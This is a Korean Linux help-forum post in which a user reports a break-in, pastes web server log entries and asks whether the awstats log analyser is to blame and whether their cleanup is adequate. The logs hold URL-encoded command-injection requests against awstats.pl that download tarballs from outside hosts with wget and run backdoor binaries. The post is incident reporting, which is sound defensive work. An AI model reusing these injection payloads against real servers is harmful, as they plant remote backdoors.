질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

해킹을 당했습니다.

작성자 정보

  • 씨큐 작성
  • 작성일

컨텐츠 정보

본문

웹로그에 다음과 같은 내용이 있네요

24.235.97.194 - - [10/Jun/2005:08:32:36 +0900] "GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3b%20cd%20%2fvar%2ftmp%20%3b%20mkdir%20%2escr%20%3b%20cd%20%2escr%20%3b%20wget%20mrjuic3linux%2ego%2ero%2ftty%2etar%2egz%20%3b%20tar%20xzvf%20tty%2etar%2egz%20%3b%20cd%20tty%20%3b%20mv%20ttyshd%20CROND%20%3b%20export%20PATH%3d%2e%20%3b%20CROND%20%3becho%20e_exp%3b%2500 HTTP/1.1" 200 811 "-" "-"
68.142.250.76 - - [10/Jun/2005:08:33:07 +0900] "GET /error/404error.html HTTP/1.0" 200 3662 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
218.150.179.205 - - [10/Jun/2005:08:33:23 +0900] "GET / HTTP/1.0" 200 296 "-" "-"
24.235.97.194 - - [10/Jun/2005:08:38:07 +0900] "GET //awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2fvar%2ftmp%3b%20wget%20hk%2dteam%2ehome%2ero%2fbind%2fza%2etgz%3b%20tar%20zxvf%20za%2etgz%3b%20chmod%20%2bx%20miro%3b%20%2e%2fmiro%3becho%20e_exp%3b%2500 HTTP/1.1" 200 13 "-" "-"

awstats 로그 분석툴을 돌리고 있는데..이게 문제인가요?

지금은 해킹한 파일들 모두 삭제하고 /var/tmp 디렉토리 권한을 drwx------    7 root     root         4096 Jun 13 15:15 tmp
으로 한상태 입니다. 적절한 조치가 되었는지도 궁금하네요

관련자료

댓글 0
등록된 댓글이 없습니다.
목록

공지사항

뉴스광장

  • 현재 회원수 :  60,440 명
  • 현재 강좌수 :  37,192 개
  • 현재 접속자 :  351 명